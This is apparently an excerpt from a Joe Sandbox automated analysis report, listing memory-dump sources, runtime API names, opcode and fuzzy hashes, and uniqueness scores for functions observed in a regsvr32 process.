
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1502251526-0
                                                                                                                • Opcode ID: 7037ed090fe5037cd86f1eb86cd94437b19f8eb8756befcb1912c66ca55b3f89
                                                                                                                • Instruction ID: ad9e631d1967e68d2a6a44305f25eebddb68471ffacfe41355917a7f6a7a65d7
                                                                                                                • Opcode Fuzzy Hash: 7037ed090fe5037cd86f1eb86cd94437b19f8eb8756befcb1912c66ca55b3f89
                                                                                                                • Instruction Fuzzy Hash: 54C1B5B2A2828687DB24CF65E144F69B791F794784F988139DB4F93784DA7CF806CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.46%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 1286766494-0
                                                                                                                • Opcode ID: 4b7902a0867223c8bb6774bec9deb4d3dadb0478a3feb4c1dbec732afa533098
                                                                                                                • Instruction ID: b9c737cf3992aa5cfbcb02e1796e1fdc844abf8df30288162c0df9549d09c2dd
                                                                                                                • Opcode Fuzzy Hash: 4b7902a0867223c8bb6774bec9deb4d3dadb0478a3feb4c1dbec732afa533098
                                                                                                                • Instruction Fuzzy Hash: 98919EA2F2561285EE18CAB5D550BB962A0BF54748F884139DE0FE7795EFADF40BC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 7.75%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: gfffffff
                                                                                                                • API String ID: 3215553584-1523873471
                                                                                                                • Opcode ID: 458cad0f7dfa7b366713080c5b4a286e7047a7fc511e2f3888d5a880ce994ccc
                                                                                                                • Instruction ID: 3479a6b9249024818e345f4e9299b68a94362eeb50510c45a060f5311af07d43
                                                                                                                • Opcode Fuzzy Hash: 458cad0f7dfa7b366713080c5b4a286e7047a7fc511e2f3888d5a880ce994ccc
                                                                                                                • Instruction Fuzzy Hash: C49154A2B097C587EB11CB659410BBD77A4BB64B84F498036CE4E97781EE7DF50AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 2.84%

                                                                                                                APIs
                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD2B6D
                                                                                                                  • Part of subcall function 00007FF983DBE11C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF983DBE125
                                                                                                                  • Part of subcall function 00007FF983DBE11C: GetCurrentProcess.KERNEL32 ref: 00007FF983DBE14A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                • String ID: -
                                                                                                                • API String ID: 4036615347-2547889144
                                                                                                                • Opcode ID: 075ee9569f13d2f21254a51ebf6a57380c8f5e67d272522593fce02a84dfa4e3
                                                                                                                • Instruction ID: bc7c941f96a8076a412c066918ac0786e1aa78585e1497a4f67b4493a9e8e448
                                                                                                                • Opcode Fuzzy Hash: 075ee9569f13d2f21254a51ebf6a57380c8f5e67d272522593fce02a84dfa4e3
                                                                                                                • Instruction Fuzzy Hash: AC810AB1A0878587E664CB959500B7A7690FB557D0F884239EA9E93BDDDFBCF408C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 23.02%

                                                                                                                APIs
                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD8320
                                                                                                                  • Part of subcall function 00007FF983DBE11C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF983DBE125
                                                                                                                  • Part of subcall function 00007FF983DBE11C: GetCurrentProcess.KERNEL32 ref: 00007FF983DBE14A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                • String ID: *?
                                                                                                                • API String ID: 4036615347-2564092906
                                                                                                                • Opcode ID: b6e8f18e9d65f428ddcdbed1dc67db366eadd2802df8b3d930f982bc76d888d4
                                                                                                                • Instruction ID: 81cd15c800c9d0b7b1d6851c14396b66e37634d399a6a12d09e7b542947ed48c
                                                                                                                • Opcode Fuzzy Hash: b6e8f18e9d65f428ddcdbed1dc67db366eadd2802df8b3d930f982bc76d888d4
                                                                                                                • Instruction Fuzzy Hash: 2151C4A2F1465586EF11CBA5D800BA937A1FB44BD4B888539DE0E97B45DFBCE009C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 37.75%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 15204871-0
                                                                                                                • Opcode ID: f76a7fff9e9006fec5a7f28d3e473eb1a051618ed68587681aaadfa59f69b656
                                                                                                                • Instruction ID: 0e08cfb30ee2c16bb6ec57e3033f8a241e42b678672aea0d7ef30af432c2f497
                                                                                                                • Opcode Fuzzy Hash: f76a7fff9e9006fec5a7f28d3e473eb1a051618ed68587681aaadfa59f69b656
                                                                                                                • Instruction Fuzzy Hash: C6B18FB7600B858BEB15CF2DC88276C37A0F744B48F588869DB5E9B7A4CB79E455C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.84%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 474895018-0
                                                                                                                • Opcode ID: 59f9ca4d831363a2e04a1a8e7ab25de8e6b71d25088e3a8ec7b379f91e7998d5
                                                                                                                • Instruction ID: 9c2bd2be538b0f58ff9bc5de27c2ebc0ec23554bdf71f0d35f8c3c0db443c48e
                                                                                                                • Opcode Fuzzy Hash: 59f9ca4d831363a2e04a1a8e7ab25de8e6b71d25088e3a8ec7b379f91e7998d5
                                                                                                                • Instruction Fuzzy Hash: A871E7A2A0824247F734C9E99450B397291BF403A4F9C463DDA5FE76D5DEBEF44ACA00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.34%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 851cd6f7f6af73753dbd0bf78275a01ea245d8e9319f9f88278bd328b5183a78
                                                                                                                • Instruction ID: 962e7a8090308b3020fad7aede94e128cfaf9d6bea6d273c6d07d0735e7452b7
                                                                                                                • Opcode Fuzzy Hash: 851cd6f7f6af73753dbd0bf78275a01ea245d8e9319f9f88278bd328b5183a78
                                                                                                                • Instruction Fuzzy Hash: D251DB62B0879155F720DBB5E900BAD7BA5BB407D4F988138EE5EA7A85CF7CE109C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3215553584-4108050209
                                                                                                                • Opcode ID: 6a5c209e88f6745588820d8e95aa97d63c799d7da624935c248ba6461d0ae551
                                                                                                                • Instruction ID: d1fb51bc505adf5ba6d7b65a91f1138c67d8526aaa179b26ef4992ef9f0a53f9
                                                                                                                • Opcode Fuzzy Hash: 6a5c209e88f6745588820d8e95aa97d63c799d7da624935c248ba6461d0ae551
                                                                                                                • Instruction Fuzzy Hash: CE71D6DAA1820252EB68DA655000F7D2698FF40744FCC5139DDCBBB699CFADF85BC604
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.03%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3215553584-4108050209
                                                                                                                • Opcode ID: 2257af8bb78518c90c99f5aa40edd27ee38284e92282c9c81efd08d27187f4eb
                                                                                                                • Instruction ID: f4eaffed5613f07dc65119eb5fd22f22692010c21965ba928573fafccfb8307a
                                                                                                                • Opcode Fuzzy Hash: 2257af8bb78518c90c99f5aa40edd27ee38284e92282c9c81efd08d27187f4eb
                                                                                                                • Instruction Fuzzy Hash: 2F61D391A0C24246EA64CAA99000BB95799BB41744FDC113DDCCBBF6A9CEADF84AC741
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.03%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 5e1e4bb0f0b2f6dfdef5c1ec2e78eda0e9ad3e05f996ff3bd65050bc608e073d
                                                                                                                • Instruction ID: 6af622ccaa5d961ec7f8b90d7b82104c36ac12aea43c01b0b24805cbc1e51c1d
                                                                                                                • Opcode Fuzzy Hash: 5e1e4bb0f0b2f6dfdef5c1ec2e78eda0e9ad3e05f996ff3bd65050bc608e073d
                                                                                                                • Instruction Fuzzy Hash: 5FB04864E06A06D2AA09AF616882B2822A4BB48711B8D0038C04DA0320DE6C20A99710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.04%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6173420ede10ff6efbe921fa0176f33509d067a66c0df4ca7d27c4e7449003a3
                                                                                                                • Instruction ID: 21f49cf1066550f233b9f1a025d9796051912e0233f176c2dbca90aaec733abb
                                                                                                                • Opcode Fuzzy Hash: 6173420ede10ff6efbe921fa0176f33509d067a66c0df4ca7d27c4e7449003a3
                                                                                                                • Instruction Fuzzy Hash: BE4273A1D2DE4784E253CBB59811B356B24BF52380F87933AE80FB6651DFACF55AC600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b98a2c773692cf639131850ba5b69bb18f7f098f2f48057aa76cc7cd74c70fe
                                                                                                                • Instruction ID: de4f13de43da49f50a0f152a4b281143dc0b7db3f9ffeff7fbfc591a9f7f33ab
                                                                                                                • Opcode Fuzzy Hash: 2b98a2c773692cf639131850ba5b69bb18f7f098f2f48057aa76cc7cd74c70fe
                                                                                                                • Instruction Fuzzy Hash: 85E11993B0498286E39C8759CA5673D36E2FB94341F9AC03BEE4ADA798F93CD444C301
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleView$CreateMappingUnmapWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 2825254369-0
                                                                                                                • Opcode ID: 0940a7758f65e4b82048ce8da26de0430a3479ea129dd08e2dac05fff6392f98
                                                                                                                • Instruction ID: cd777e9618d1c8bb7798e4672870d5a2e6acf5963d8f4bb1720fead505f10c1e
                                                                                                                • Opcode Fuzzy Hash: 0940a7758f65e4b82048ce8da26de0430a3479ea129dd08e2dac05fff6392f98
                                                                                                                • Instruction Fuzzy Hash: 4AE12792B181B589FB05D6B684107FC2B316712F8CF880815DD566FB8BDAEEE309C761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b83f53bb26f40cb8457967346dc09ae2c64d3fd2bceaf58f71d9a9fe766d9d3a
                                                                                                                • Instruction ID: 1518f19141c59ff4cd3bac5187241cd5adbfadfd813b86a519627f8de3b53d9a
                                                                                                                • Opcode Fuzzy Hash: b83f53bb26f40cb8457967346dc09ae2c64d3fd2bceaf58f71d9a9fe766d9d3a
                                                                                                                • Instruction Fuzzy Hash: 2C9105A2B3C14246EA29CEB59010BB92690BF50754F9C123DDA6BE77C5DDACF40FD600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 68ca95d3d1974c7bbcf6cbcf847bb496cd3f53e2f8716573e572d08246ae4024
                                                                                                                • Instruction ID: 982774795be38fe97431379f562ee1274cfde71da82418b0a71373b5b28e34c3
                                                                                                                • Opcode Fuzzy Hash: 68ca95d3d1974c7bbcf6cbcf847bb496cd3f53e2f8716573e572d08246ae4024
                                                                                                                • Instruction Fuzzy Hash: 8EB118B3B192C54AC704CF789400ABD7BA1F75AB48B4C413ADE8ED774AC92CE60AC750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65cfb915bb10e58a7e6474d5265362da27308c6e97c2f9a1a521d71be33d78a3
                                                                                                                • Instruction ID: c509cc941a55c8a389226b65bc171b4844baeefeed462b764cb6688367682e13
                                                                                                                • Opcode Fuzzy Hash: 65cfb915bb10e58a7e6474d5265362da27308c6e97c2f9a1a521d71be33d78a3
                                                                                                                • Instruction Fuzzy Hash: 61819487A094D147E3AC8159865673D6AD3BFE0600F99C03FFE46AD6C9E4BCEC48D242
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c00d2bfa4dde16540d4a302e8cec21300b8c2ccf1d6be99b8b5535cb92223fe7
                                                                                                                • Instruction ID: 4ff5986dbf72d110ae76aa94d8daf87a3909b08a06547c08cfc2d6a496985804
                                                                                                                • Opcode Fuzzy Hash: c00d2bfa4dde16540d4a302e8cec21300b8c2ccf1d6be99b8b5535cb92223fe7
                                                                                                                • Instruction Fuzzy Hash: 43715CB3A15BD186D310CF21E948FED33A8F39934CF866229DE9843A55DF74A1A5D700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
